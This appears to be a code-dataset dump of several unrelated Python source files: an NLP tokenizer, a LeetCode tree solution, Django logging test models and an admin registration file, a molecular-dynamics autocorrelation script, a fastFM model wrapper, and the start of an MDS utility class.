3e246085f72d7330f51f46130b2cc931e524e49e | 3,261 | py | Python | nlptoolkit/nlp.py | jeroyang/nlptoolkit | d788fa9011133dca86823b590d23070883e59918 | [
"MIT"
] | null | null | null | nlptoolkit/nlp.py | jeroyang/nlptoolkit | d788fa9011133dca86823b590d23070883e59918 | [
"MIT"
] | null | null | null | nlptoolkit/nlp.py | jeroyang/nlptoolkit | d788fa9011133dca86823b590d23070883e59918 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import re
from itertools import chain, combinations
def clause_tokenize(sentence):
"""Split on comma or parenthesis, if there are more then three words for each clause"""
clause_re = re.compile(r'((?:\S+\s){2,}\S+,|(?:\S+\s){3,}(?=\((?:\S+\s){2,}\S+\)))')
clause_stem = clause_re.sub(r'\1###clausebreak###', sentence)
return [c for c in clause_stem.split('###clausebreak###') if c!='']
def word_tokenize(sentence):
"""Cut the sentence in into tokens without deleting anything"""
number_pattern = ['\d+\.\d+']
arr_pattern = ['(?: \w\.){2,3}|(?:\A|\s)(?:\w\.){2,3}|[A-Z]\. [a-z]']
escape_re = re.compile("|".join(number_pattern + arr_pattern))
escapes = escape_re.findall(sentence)
escaped_stem = escape_re.sub('protectprotectprotect', sentence)
word_stem = re.sub("([%s])" % re.escape('!"#$%&()*,./:;<=>?@[\]^_`{|}~'), r' \1 ', escaped_stem)
escaped_word_stem = word_stem.replace('{','{{').replace('}', '}}')
result = escaped_word_stem.replace('protectprotectprotect', '{}').format(*escapes)
return [r.strip() for r in result.split(' ') if r != '']
def slim_stem(token):
"""A very simple stemmer, for entity of GO stemming"""
target_subfixs = ['ic', 'tic', 'e', 'ive', 'ing', 'ical', 'nal', 'al', 'ism', 'ion', 'ation', 'ar', 'sis', 'us', 'ment']
for subfix in sorted(target_subfixs, key=len, reverse=True):
idx = token.find(subfix)
if idx != -1 and idx == len(token)-len(subfix):
return token[0:-len(subfix)]
return token
def powerset(iterable):
"powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
s = list(iterable)
return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
def ngram(n, iter_tokens):
"""Return a generator of n-gram from an iterable"""
z = len(iter_tokens)
return (iter_tokens[i:i+n] for i in xrange(z-n+1))
def power_ngram(iter_tokens):
"""Generate unigram, bigram, trigram ... and the max-gram,
different from powerset(), this function will not generate skipped combinations such as (1,3)"""
return chain.from_iterable(ngram(j, iter_tokens) for j in xrange(1, len(iter_tokens)))
| 45.929577 | 134 | 0.59399 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import re
from itertools import chain, combinations
def sent_tokenize(context):
    """Split *context* into sentences, first protecting spans whose internal
    punctuation must not trigger a split: bracketed text, decimal numbers and
    common abbreviations ("et al.", "Fig. 3", "Dr.", "vs.", ...)."""
    paired_symbols = [("(", ")"),
                      ("[", "]"),
                      ("{", "}")]
    # One non-greedy pattern per bracket pair, e.g. r'\(.*?\)'.
    paired_patterns = ["%s.*?%s" % (re.escape(lt), re.escape(rt)) for lt, rt in paired_symbols]
    number_pattern = ['\d+\.\d+']
    arr_pattern = ['(?: \w\.){2,3}|(?:\A|\s)(?:\w\.){2,3}|[A-Z]\. [a-z]|\svs\. |et al\.|Fig\. \d|approx\.|(?:Prof|Dr)\. (?:[A-Z]\.)?']
    escape_re = re.compile("|".join(paired_patterns + number_pattern + arr_pattern))
    escapes = escape_re.findall(context)
    # Replace each protected span with a '{}' placeholder ...
    escaped_stem = escape_re.sub('{}', context)
    # ... then double any remaining literal braces so str.format() below
    # leaves them untouched.
    escaped_escaped_stem = escaped_stem.replace('{','{{').replace('}', '}}')
    # NOTE(review): the character class [\n$] matches a newline or a literal
    # '$', not end-of-string — confirm that is intended.
    sent_re = re.compile(r'([A-Z0-9]..+?(?:[.!?]\s|[\n$]))')
    sent_stem = sent_re.sub(r'\1###linebreak###', escaped_escaped_stem)
    # Un-double the placeholders and re-insert the protected spans.
    recovered_sent_stem = sent_stem.replace('{{}}', '{}')
    result = recovered_sent_stem.format(*escapes)
    return [r.strip() for r in result.split('###linebreak###') if r != '']
def sent_count(context):
    """Return how many sentences sent_tokenize() finds in *context*."""
    sentences = sent_tokenize(context)
    return len(sentences)
def clause_tokenize(sentence):
    """Split *sentence* into clauses at a comma (or just before a
    parenthetical), but only where the clause contains three or more words."""
    boundary_re = re.compile(r'((?:\S+\s){2,}\S+,|(?:\S+\s){3,}(?=\((?:\S+\s){2,}\S+\)))')
    marked = boundary_re.sub(r'\1###clausebreak###', sentence)
    pieces = marked.split('###clausebreak###')
    return [piece for piece in pieces if piece != '']
def word_tokenize(sentence):
    """Cut the sentence into tokens while preserving every original character."""
    # Decimal numbers and dotted abbreviations must survive tokenisation intact.
    protect_re = re.compile("|".join(['\d+\.\d+', '(?: \w\.){2,3}|(?:\A|\s)(?:\w\.){2,3}|[A-Z]\. [a-z]']))
    protected = protect_re.findall(sentence)
    stem = protect_re.sub('protectprotectprotect', sentence)
    # Pad every punctuation character with spaces so it becomes its own token.
    stem = re.sub("([%s])" % re.escape('!"#$%&()*,./:;<=>?@[\]^_`{|}~'), r' \1 ', stem)
    # Escape literal braces, then re-insert the protected spans via format().
    stem = stem.replace('{', '{{').replace('}', '}}')
    restored = stem.replace('protectprotectprotect', '{}').format(*protected)
    return [token.strip() for token in restored.split(' ') if token != '']
def slim_stem(token):
    """A very simple suffix stemmer, for stemming GO entity names.

    Strips the longest listed suffix from *token* (ties broken by declaration
    order); returns *token* unchanged when no suffix matches.
    """
    target_subfixs = ['ic', 'tic', 'e', 'ive', 'ing', 'ical', 'nal', 'al', 'ism', 'ion', 'ation', 'ar', 'sis', 'us', 'ment']
    for subfix in sorted(target_subfixs, key=len, reverse=True):
        # endswith() is the correct test: the previous find()-based check
        # missed tokens where the suffix also occurs earlier in the word
        # (e.g. 'ionion' was left unstemmed).
        if token.endswith(subfix):
            return token[:-len(subfix)]
    return token
def powerset(iterable):
    "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
    pool = list(iterable)
    by_size = (combinations(pool, size) for size in range(len(pool) + 1))
    return chain.from_iterable(by_size)
def ngram(n, iter_tokens):
    """Return a generator over the length-*n* slices (n-grams) of a sequence."""
    z = len(iter_tokens)
    # range(), not Python 2's xrange(), so this works on Python 3.
    return (iter_tokens[i:i + n] for i in range(z - n + 1))

def power_ngram(iter_tokens):
    """Generate unigram, bigram, trigram ... and the max-gram,
    different from powerset(), this function will not generate skipped combinations such as (1,3)"""
    # Upper bound is len+1 so the final full-length max-gram is included,
    # as the docstring promises (the original range stopped one short).
    return chain.from_iterable(ngram(j, iter_tokens) for j in range(1, len(iter_tokens) + 1))
| 974 | 0 | 46 |
ab1daa3d066e1ffb657c4f2921c471c9002bf834 | 234 | py | Python | poc/classes/AuxSTExtension.py | bookofproofs/fpl | 527b43b0f8bb3d459ee906e5ed8524a676ce3a2c | [
"MIT"
] | 4 | 2021-11-08T10:09:46.000Z | 2021-11-13T22:25:46.000Z | poc/classes/AuxSTExtension.py | bookofproofs/fpl | 527b43b0f8bb3d459ee906e5ed8524a676ce3a2c | [
"MIT"
] | 1 | 2020-09-04T13:02:09.000Z | 2021-06-16T07:07:44.000Z | poc/classes/AuxSTExtension.py | bookofproofs/fpl | 527b43b0f8bb3d459ee906e5ed8524a676ce3a2c | [
"MIT"
] | 1 | 2021-11-08T10:10:12.000Z | 2021-11-08T10:10:12.000Z | from poc.classes.AuxST import AuxST
from poc.classes.AuxSymbolTable import AuxSymbolTable
| 21.272727 | 55 | 0.726496 | from poc.classes.AuxST import AuxST
from poc.classes.AuxSymbolTable import AuxSymbolTable
class AuxSTExtension(AuxST):
    """Symbol-table node representing an FPL extension declaration."""
    def __init__(self, i):
        # NOTE(review): registers under AuxSymbolTable.block_axiom rather than
        # a dedicated extension outline type — confirm this is intentional.
        super().__init__(AuxSymbolTable.block_axiom, i)
        # The extension's content string; initialised empty.
        self.extension = ""
| 85 | 7 | 50 |
2bc64e80bf72ed0f849deeb18ccd8a8117379138 | 1,517 | py | Python | sols/111.py | Paul11100/LeetCode | 9896c579dff1812c0c76964db8d60603ee715e35 | [
"MIT"
] | null | null | null | sols/111.py | Paul11100/LeetCode | 9896c579dff1812c0c76964db8d60603ee715e35 | [
"MIT"
] | null | null | null | sols/111.py | Paul11100/LeetCode | 9896c579dff1812c0c76964db8d60603ee715e35 | [
"MIT"
] | null | null | null | from collections import deque
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
# BFS (Accepted), O(n) time, O(n) space
# # BFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root:
# return 0
# queue = collections.deque([(root, 1)])
# while queue:
# node, level = queue.popleft()
# if node:
# if not node.left and not node.right:
# return level
# else:
# queue.append((node.left, level+1))
# queue.append((node.right, level+1))
# # DFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root: return 0
# d = list(map(self.minDepth, (root.left, root.right)))
# return 1 + (min(d) or max(d))
| 32.276596 | 63 | 0.507581 | from collections import deque
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    """LeetCode 111 — minimum depth of a binary tree."""

    # BFS (Accepted), O(n) time, O(n) space
    def minDepth(self, root: 'TreeNode') -> int:
        """Return the number of nodes on the shortest root-to-leaf path.

        The annotation is quoted because TreeNode is only defined in the
        commented-out header above; an unquoted name raised NameError at
        import time.  BFS guarantees the first leaf dequeued lies at the
        minimal depth, so we can return immediately.
        """
        if root is None:
            # Empty tree has depth 0.
            return 0
        queue = deque([(root, 1)])
        while queue:
            node, depth = queue.popleft()
            if not node.left and not node.right:
                # First leaf reached in level order -> minimal depth.
                return depth
            if node.left:
                queue.append((node.left, depth + 1))
            if node.right:
                queue.append((node.right, depth + 1))
# # BFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root:
# return 0
# queue = collections.deque([(root, 1)])
# while queue:
# node, level = queue.popleft()
# if node:
# if not node.left and not node.right:
# return level
# else:
# queue.append((node.left, level+1))
# queue.append((node.right, level+1))
# # DFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root: return 0
# d = list(map(self.minDepth, (root.left, root.right)))
# return 1 + (min(d) or max(d))
| 462 | -6 | 49 |
8405fff54c92d57f94de1396e91c12fad7fcdf98 | 3,035 | py | Python | automated_logging/tests/models.py | rewardz/django-automated-logging | 3f7c578b42de1e5ddc72cac79014715fc7dffa46 | [
"MIT"
] | 31 | 2018-02-19T08:06:00.000Z | 2021-08-11T14:42:51.000Z | automated_logging/tests/models.py | rewardz/django-automated-logging | 3f7c578b42de1e5ddc72cac79014715fc7dffa46 | [
"MIT"
] | 11 | 2018-09-08T21:11:52.000Z | 2021-09-24T15:49:36.000Z | automated_logging/tests/models.py | rewardz/django-automated-logging | 3f7c578b42de1e5ddc72cac79014715fc7dffa46 | [
"MIT"
] | 11 | 2018-02-18T14:56:04.000Z | 2021-06-23T09:16:17.000Z | import uuid
from django.db.models import (
Model,
UUIDField,
DateTimeField,
ManyToManyField,
CASCADE,
ForeignKey,
OneToOneField,
CharField,
)
from automated_logging.decorators import exclude_model, include_model
class TestBase(Model):
""" Base for all the test models """
id = UUIDField(default=uuid.uuid4, primary_key=True)
created_at = DateTimeField(auto_now_add=True)
updated_at = DateTimeField(auto_now=True)
class OrdinaryBaseTest(TestBase):
""" Ordinary base test. Has a random char field."""
random = CharField(max_length=255, null=True)
random2 = CharField(max_length=255, null=True)
class OrdinaryTest(OrdinaryBaseTest):
""" Ordinary test. Has a random char field."""
class M2MTest(TestBase):
""" Used to test the Many-To-Many Relationship functionality of DAL"""
relationship = ManyToManyField(OrdinaryTest)
class ForeignKeyTest(TestBase):
""" Used to test ForeignKey functionality of DAL."""
relationship = ForeignKey(OrdinaryTest, on_delete=CASCADE, null=True)
class OneToOneTest(TestBase):
""" Used to test the One-To-One Relationship functionality of DAL."""
relationship = OneToOneField(OrdinaryTest, on_delete=CASCADE, null=True)
class SpeedTest(TestBase):
""" Used to test the speed of DAL """
for idx in range(100):
exec(f"column{idx} = CharField(max_length=15, null=True)")
class FullClassBasedExclusionTest(OrdinaryBaseTest):
""" Used to test the full model exclusion via meta class"""
class PartialClassBasedExclusionTest(OrdinaryBaseTest):
""" Used to test partial ignore via fields """
@exclude_model
class FullDecoratorBasedExclusionTest(OrdinaryBaseTest):
""" Used to test full decorator exclusion """
@exclude_model(operations=['delete'], fields=['random'])
class PartialDecoratorBasedExclusionTest(OrdinaryBaseTest):
""" Used to test partial decorator exclusion """
@include_model
class DecoratorOverrideExclusionTest(OrdinaryBaseTest):
"""
Used to check if include_model
has precedence over class based configuration
"""
| 22.819549 | 76 | 0.689951 | import uuid
from django.db.models import (
Model,
UUIDField,
DateTimeField,
ManyToManyField,
CASCADE,
ForeignKey,
OneToOneField,
CharField,
)
from automated_logging.decorators import exclude_model, include_model
class TestBase(Model):
    """ Base for all the test models """
    # Random UUID primary key, generated client-side per row.
    id = UUIDField(default=uuid.uuid4, primary_key=True)
    # Maintained automatically by Django: set on INSERT / on every save().
    created_at = DateTimeField(auto_now_add=True)
    updated_at = DateTimeField(auto_now=True)
    class Meta:
        # Abstract base: contributes fields only, no DB table of its own.
        abstract = True
        app_label = 'automated_logging'
class OrdinaryBaseTest(TestBase):
    """ Ordinary base test. Has a random char field."""
    # Free-form fields used as mutation targets in the tests.
    random = CharField(max_length=255, null=True)
    random2 = CharField(max_length=255, null=True)
    class Meta:
        abstract = True
        app_label = 'automated_logging'
class OrdinaryTest(OrdinaryBaseTest):
    """ Ordinary test. Has a random char field."""
    # Concrete version of OrdinaryBaseTest (gets its own table).
    class Meta:
        app_label = 'automated_logging'
class M2MTest(TestBase):
    """ Used to test the Many-To-Many Relationship functionality of DAL"""
    # M2M link to OrdinaryTest rows.
    relationship = ManyToManyField(OrdinaryTest)
    class Meta:
        app_label = 'automated_logging'
class ForeignKeyTest(TestBase):
    """ Used to test ForeignKey functionality of DAL."""
    # Nullable FK; deleting the target cascades to this row.
    relationship = ForeignKey(OrdinaryTest, on_delete=CASCADE, null=True)
    class Meta:
        app_label = 'automated_logging'
class OneToOneTest(TestBase):
    """ Used to test the One-To-One Relationship functionality of DAL."""
    # Nullable 1:1 link; deleting the target cascades to this row.
    relationship = OneToOneField(OrdinaryTest, on_delete=CASCADE, null=True)
    class Meta:
        app_label = 'automated_logging'
class SpeedTest(TestBase):
    """ Used to test the speed of DAL """
    # Generates 100 CharFields (column0..column99) at class-definition time
    # so that a save touches many fields.
    for idx in range(100):
        exec(f"column{idx} = CharField(max_length=15, null=True)")
    class Meta:
        app_label = 'automated_logging'
class FullClassBasedExclusionTest(OrdinaryBaseTest):
    """ Used to test the full model exclusion via meta class"""
    class Meta:
        app_label = 'automated_logging'
    class LoggingIgnore:
        # complete=True marks the whole model as excluded from logging.
        complete = True
class PartialClassBasedExclusionTest(OrdinaryBaseTest):
    """ Used to test partial ignore via fields """
    class Meta:
        app_label = 'automated_logging'
    class LoggingIgnore:
        # Only the named field / operation are excluded from logging.
        fields = ['random']
        operations = ['delete']
# Decorator form of a full exclusion (equivalent to LoggingIgnore.complete).
@exclude_model
class FullDecoratorBasedExclusionTest(OrdinaryBaseTest):
    """ Used to test full decorator exclusion """
    class Meta:
        app_label = 'automated_logging'
# Decorator form of a partial exclusion (selected operations/fields only).
@exclude_model(operations=['delete'], fields=['random'])
class PartialDecoratorBasedExclusionTest(OrdinaryBaseTest):
    """ Used to test partial decorator exclusion """
    class Meta:
        app_label = 'automated_logging'
@include_model
class DecoratorOverrideExclusionTest(OrdinaryBaseTest):
    """
    Used to check if include_model
    has precedence over class based configuration
    """
    class Meta:
        app_label = 'automated_logging'
    class LoggingIgnore:
        # Excluded here, but the @include_model decorator should win.
        complete = True
| 0 | 513 | 405 |
c064039faf659c2d777c4940242feee054cd300d | 24 | py | Python | src/utils/__version__.py | kevin3/cwl-ica | cf706ea42993d563f364c0847ee4b882f8fe067c | [
"MIT"
] | 8 | 2021-12-08T05:33:58.000Z | 2022-03-07T00:40:48.000Z | src/utils/__version__.py | kevin3/cwl-ica | cf706ea42993d563f364c0847ee4b882f8fe067c | [
"MIT"
] | 34 | 2021-08-11T03:59:33.000Z | 2022-03-10T05:39:26.000Z | src/utils/__version__.py | kevin3/cwl-ica | cf706ea42993d563f364c0847ee4b882f8fe067c | [
"MIT"
] | 1 | 2022-01-08T07:34:55.000Z | 2022-01-08T07:34:55.000Z | version = "__VERSION__"
# Build-time placeholder: presumably substituted with the real version string
# by the release tooling — TODO confirm against the packaging scripts.
version = "__VERSION__"
| 0 | 0 | 0 |
6e2107cf51e389f1a13fc9e21fc4ac6ecc14ba63 | 2,105 | py | Python | sherlock_scripts/pythonhops/sherlock_jacf.py | apoletayev/anomalous_ion_conduction | badb91e971e4a5263a433cfa9fcbf914d53ed2a1 | [
"MIT"
] | 2 | 2021-05-20T03:49:51.000Z | 2021-06-21T08:41:10.000Z | sherlock_scripts/pythonhops/sherlock_jacf.py | apoletayev/anomalous_ion_conduction | badb91e971e4a5263a433cfa9fcbf914d53ed2a1 | [
"MIT"
] | null | null | null | sherlock_scripts/pythonhops/sherlock_jacf.py | apoletayev/anomalous_ion_conduction | badb91e971e4a5263a433cfa9fcbf914d53ed2a1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 27 10:55:08 2020
@author: andreypoletaev
Assumptions made:
time is in picoseconds, timestep is 1 fs
"""
# =============================================================================
# %% Imports & constants
# =============================================================================
import sys
from hop_utils import autocorrelation
import pandas as pd
## column names for the cases that the file is a CoM file or a single-atom velocity file
com_col_names = ['timestep', 'x', 'y', 'z', 'vx', 'vy', 'vz']
vel_col_names = ['atom_id', 'time', 'vx', 'vy', 'vz']
# =============================================================================
# %% Parse inputs
# =============================================================================
## Parse inputs. Format: key=value
options = dict([ (x.split('=')[0],x.split('=')[1]) for x in sys.argv[1:] ])
# print(options)
assert 'file' in list(options.keys()) and 'duration' in list(options.keys()), \
'please pass file=... [path] and duration=... [psec] as command-line options'
col_names = vel_col_names
header = 0
if ('com' not in list(options.keys())) or (eval(options['com']) == True) :
col_names = com_col_names
header = 2
fin = pd.read_csv(options['file'], sep=' ', skiprows=header, names=col_names, index_col=False)
# print(fin.head(5))
## convert time from [steps] to [ps] if the input file has the former
try : fin['time'] = fin.timestep / 1000. ## hard-coded conversion from steps to picoseconds
except : pass
fin.set_index('time', inplace=True)
# folder = '/'.join(options['file'].split('/')[:-1])
# fn = options['file'].split('/')[-1]
dur = int(options['duration'])
fout = options['file_out']
## do the actual computation of the autocorrelation function
print(f'computing {options["file"]}')
jacf = autocorrelation(fin, dur, ['x','y','z'], verbose=True, to_file=fout).reset_index().rename(columns={'index':'time'})
# jacf.to_csv(folder+'/'+fn[3:-4]+f'_{dur}ps.csv', index=False)
print(f'computed and saved {options["file"]}') | 32.384615 | 122 | 0.55772 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 27 10:55:08 2020
@author: andreypoletaev
Assumptions made:
time is in picoseconds, timestep is 1 fs
"""
# =============================================================================
# %% Imports & constants
# =============================================================================
import sys
from hop_utils import autocorrelation
import pandas as pd
## column names for the cases that the file is a CoM file or a single-atom velocity file
com_col_names = ['timestep', 'x', 'y', 'z', 'vx', 'vy', 'vz']
vel_col_names = ['atom_id', 'time', 'vx', 'vy', 'vz']
# =============================================================================
# %% Parse inputs
# =============================================================================
## Parse inputs. Format: key=value
options = dict([ (x.split('=')[0],x.split('=')[1]) for x in sys.argv[1:] ])
# print(options)
assert 'file' in list(options.keys()) and 'duration' in list(options.keys()), \
    'please pass file=... [path] and duration=... [psec] as command-line options'
col_names = vel_col_names
header = 0
## 'com' absent or truthy -> treat the input as a center-of-mass file
## (different columns, two header rows to skip).
## NOTE(review): eval() on a command-line value executes arbitrary code —
## a safe parse such as options['com'].lower() in ('true', '1') is preferable.
if ('com' not in list(options.keys())) or (eval(options['com']) == True) :
    col_names = com_col_names
    header = 2
fin = pd.read_csv(options['file'], sep=' ', skiprows=header, names=col_names, index_col=False)
# print(fin.head(5))
## convert time from [steps] to [ps] if the input file has the former
try : fin['time'] = fin.timestep / 1000. ## hard-coded conversion from steps to picoseconds
except : pass
fin.set_index('time', inplace=True)
# folder = '/'.join(options['file'].split('/')[:-1])
# fn = options['file'].split('/')[-1]
dur = int(options['duration'])
## NOTE(review): 'file_out' is required here but is not covered by the
## assert above — a missing key raises a bare KeyError.
fout = options['file_out']
## do the actual computation of the autocorrelation function
print(f'computing {options["file"]}')
jacf = autocorrelation(fin, dur, ['x','y','z'], verbose=True, to_file=fout).reset_index().rename(columns={'index':'time'})
# jacf.to_csv(folder+'/'+fn[3:-4]+f'_{dur}ps.csv', index=False)
print(f'computed and saved {options["file"]}') | 0 | 0 | 0 |
b13e94b4438f73055adcddf25912666ad6090be7 | 456 | py | Python | symptoms/admin.py | sjsafranek/symptom_tracker | 2e7d9ff3ed946ebbf18b366bbe79deb3b3c94a5c | [
"MIT"
] | null | null | null | symptoms/admin.py | sjsafranek/symptom_tracker | 2e7d9ff3ed946ebbf18b366bbe79deb3b3c94a5c | [
"MIT"
] | null | null | null | symptoms/admin.py | sjsafranek/symptom_tracker | 2e7d9ff3ed946ebbf18b366bbe79deb3b3c94a5c | [
"MIT"
] | null | null | null | from django.contrib import admin
from . import models
admin.site.register(models.Agency)
admin.site.register(models.Therapist)
admin.site.register(models.Client)
admin.site.register(models.ClientSymptom)
admin.site.register(models.Session)
admin.site.register(models.SymptomScore)
# from guardian.admin import GuardedModelAdmin
#
# class SymptomScoreAdmin(GuardedModelAdmin):
# pass
#
# admin.site.register(models.SymptomScore, SymptomScoreAdmin)
| 24 | 61 | 0.811404 | from django.contrib import admin
from . import models
admin.site.register(models.Agency)
admin.site.register(models.Therapist)
admin.site.register(models.Client)
admin.site.register(models.ClientSymptom)
admin.site.register(models.Session)
admin.site.register(models.SymptomScore)
# from guardian.admin import GuardedModelAdmin
#
# class SymptomScoreAdmin(GuardedModelAdmin):
# pass
#
# admin.site.register(models.SymptomScore, SymptomScoreAdmin)
| 0 | 0 | 0 |
40cd83ad44db70333ce38a5c61c142021c8a2fe6 | 6,037 | py | Python | models/algorithms/libfm_fastfm.py | ucds-sg/h2oai | 7042860767dc25d1a7d7122103bbd5016d02df53 | [
"Apache-2.0"
] | 194 | 2019-04-23T10:25:13.000Z | 2022-03-29T04:19:28.000Z | models/algorithms/libfm_fastfm.py | ucds-sg/h2oai | 7042860767dc25d1a7d7122103bbd5016d02df53 | [
"Apache-2.0"
] | 50 | 2019-06-24T20:17:51.000Z | 2022-03-16T20:05:37.000Z | models/algorithms/libfm_fastfm.py | ucds-sg/h2oai | 7042860767dc25d1a7d7122103bbd5016d02df53 | [
"Apache-2.0"
] | 85 | 2019-03-27T12:26:43.000Z | 2022-01-27T13:15:37.000Z | """LibFM implementation of fastFM """
import datatable as dt
import numpy as np
from sklearn.preprocessing import LabelEncoder
from h2oaicore.models import CustomModel
from sklearn.model_selection import StratifiedKFold
from sklearn.calibration import CalibratedClassifierCV
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.preprocessing import StandardScaler
from scipy.sparse import csr_matrix
# paper: https://arxiv.org/abs/1505.00641
| 39.980132 | 109 | 0.563525 | """LibFM implementation of fastFM """
import datatable as dt
import numpy as np
from sklearn.preprocessing import LabelEncoder
from h2oaicore.models import CustomModel
from sklearn.model_selection import StratifiedKFold
from sklearn.calibration import CalibratedClassifierCV
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.preprocessing import StandardScaler
from scipy.sparse import csr_matrix
# paper: https://arxiv.org/abs/1505.00641
class FastFMModel(CustomModel):
_regression = True
_binary = True
_multiclass = False # WIP
_display_name = "fastFM"
_description = "LibFM implementation of fastFM"
# als.FMRegression(n_iter=1000, init_stdev=0.1, rank=2, l2_reg_w=0.1, l2_reg_V=0.5)
_modules_needed_by_name = ['fastFM']
@staticmethod
def is_enabled():
# fails sometimes with
# ffm_als_mcmc.c:172: sparse_fit: Assertion `(sizeof (*w_0) == sizeof (float) ? __finitef (*w_0) :
# sizeof (*w_0) == sizeof (double) ? __finite (*w_0) : __finitel (*w_0)) && "w_0 not finite"' failed.
return False
def set_default_params(self,
accuracy=None, time_tolerance=None, interpretability=None,
**kwargs):
n_iter = min(max(kwargs['n_iter'], 1), 100000) if 'n_iter' in kwargs else 100
init_stdev = max(kwargs['init_stdev'], 0.000001) if 'init_stdev' in kwargs else 0.1
rank = min(max(kwargs['rank'], 0), 2) if 'rank' in kwargs else 2
l2_reg_w = max(kwargs['l2_reg_w'], 0.000000001) if 'l2_reg_w' in kwargs else 0.1
l2_reg_V = max(kwargs['l2_reg_V'], 0.000000001) if 'l2_reg_V' in kwargs else 0.5
# random_state = kwargs['random_state'] if 'random_state' in kwargs else 12345
self.params = {'n_iter': n_iter,
'init_stdev': init_stdev,
'rank': rank,
'l2_reg_w': l2_reg_w,
'l2_reg_V': l2_reg_V,
}
def mutate_params(self,
accuracy=10,
**kwargs):
if accuracy > 8:
list_of_n_iter = [200, 300, 400, 500, 1000, 2000]
elif accuracy >= 5:
list_of_n_iter = [50, 100, 200, 300, 400, 500]
else:
list_of_n_iter = [10, 50, 100, 150, 200, 250, 300]
list_of_init_stdev = [0.0001, 0.001, 0.01, 0.1, 0.5, 1.]
list_of_reg_w = [0.0001, 0.001, 0.01, 0.1, 1., 3., 10.]
list_of_l2_reg_V = [0.001, 0.01, 0.1, 1., 3., 10., 20.]
n_iter_index = np.random.randint(0, high=len(list_of_n_iter))
reg_w_index = np.random.randint(0, high=len(list_of_reg_w))
reg_V_index = np.random.randint(0, high=len(list_of_l2_reg_V))
init_stdev_index = np.random.randint(0, high=len(list_of_init_stdev))
n_iter = list_of_n_iter[n_iter_index]
reg_w = list_of_reg_w[reg_w_index]
reg_V = list_of_l2_reg_V[reg_V_index]
init_stdev = list_of_init_stdev[init_stdev_index]
rank = 2
self.params = {'n_iter': n_iter,
'init_stdev': init_stdev,
'rank': rank,
'l2_reg_w': reg_w,
'l2_reg_V': reg_V,
}
def fit(self, X, y, sample_weight=None, eval_set=None, sample_weight_eval_set=None, **kwargs):
from fastFM import als
X = dt.Frame(X)
orig_cols = list(X.names)
if self.num_classes >= 2:
model = als.FMClassification(n_iter=self.params["n_iter"], init_stdev=self.params["init_stdev"],
rank=self.params["rank"], l2_reg_w=self.params["l2_reg_w"],
l2_reg_V=self.params["l2_reg_V"], random_state=self.random_state)
lb = LabelEncoder()
lb.fit(self.labels)
y = lb.transform(y)
y[y != 1] = -1
else:
model = als.FMRegression(n_iter=self.params["n_iter"], init_stdev=self.params["init_stdev"],
rank=self.params["rank"], l2_reg_w=self.params["l2_reg_w"],
l2_reg_V=self.params["l2_reg_V"], random_state=self.random_state)
self.means = dict()
self.standard_scaler = StandardScaler()
for col in X.names:
XX = X[:, col]
self.means[col] = XX.mean1()
if np.isnan(self.means[col]):
self.means[col] = 0
XX.replace(None, self.means[col])
X[:, col] = XX
assert X[dt.isna(dt.f[col]), col].nrows == 0
X = X.to_numpy()
X = self.standard_scaler.fit_transform(X)
X = csr_matrix(X) # requires sparse matrix
model.fit(X, y)
importances = np.array(abs(model.w_))
self.set_model_properties(model=model,
features=orig_cols,
importances=importances.tolist(), # abs(model.coef_[0])
iterations=0)
def predict(self, X, **kwargs):
from fastFM import als
X = dt.Frame(X)
for col in X.names:
XX = X[:, col]
XX.replace(None, self.means[col])
X[:, col] = XX
pred_contribs = kwargs.get('pred_contribs', None)
output_margin = kwargs.get('output_margin', None)
model, _, _, _ = self.get_model_properties()
X = X.to_numpy()
X = self.standard_scaler.transform(X)
X = csr_matrix(X) # requires sparse matrix
if not pred_contribs:
if self.num_classes == 1:
preds = model.predict(X)
else:
preds = np.array(model.predict_proba(X))
preds = np.column_stack((1 - preds, preds))
# preds = (prob_pos - prob_pos.min()) / (prob_pos.max() - prob_pos.min())
return preds
else:
raise NotImplementedError("No Shapley for SVM")
| 5,106 | 447 | 23 |
da62656679c6f24aafd02686ce50bd44338b6f04 | 25,831 | py | Python | lib/kb_Amplicon/Utils/MDSUtils.py | muddymicrobes/MDS | ab85959d85ffb0dd1dbf2537ae4d756f8cbed7e5 | [
"MIT"
] | null | null | null | lib/kb_Amplicon/Utils/MDSUtils.py | muddymicrobes/MDS | ab85959d85ffb0dd1dbf2537ae4d756f8cbed7e5 | [
"MIT"
] | null | null | null | lib/kb_Amplicon/Utils/MDSUtils.py | muddymicrobes/MDS | ab85959d85ffb0dd1dbf2537ae4d756f8cbed7e5 | [
"MIT"
] | null | null | null |
import errno
import json
import logging
import os
import shutil
import uuid
import zipfile
import re
import subprocess
import pandas as pd
from kb_Amplicon.Utils.DataUtil import DataUtil
from installed_clients.DataFileUtilClient import DataFileUtil
from installed_clients.KBaseReportClient import KBaseReport
| 43.268007 | 121 | 0.597964 |
import errno
import json
import logging
import os
import shutil
import uuid
import zipfile
import re
import subprocess
import pandas as pd
from kb_Amplicon.Utils.DataUtil import DataUtil
from installed_clients.DataFileUtilClient import DataFileUtil
from installed_clients.KBaseReportClient import KBaseReport
class MDSUtils:
R_BIN = '/kb/deployment/bin'
MDS_OUT_DIR = 'mds_output'
PARAM_IN_WS = 'workspace_name'
PARAM_IN_MATRIX = 'input_obj_ref'
PARAM_OUT_MATRIX = 'mds_matrix_name'
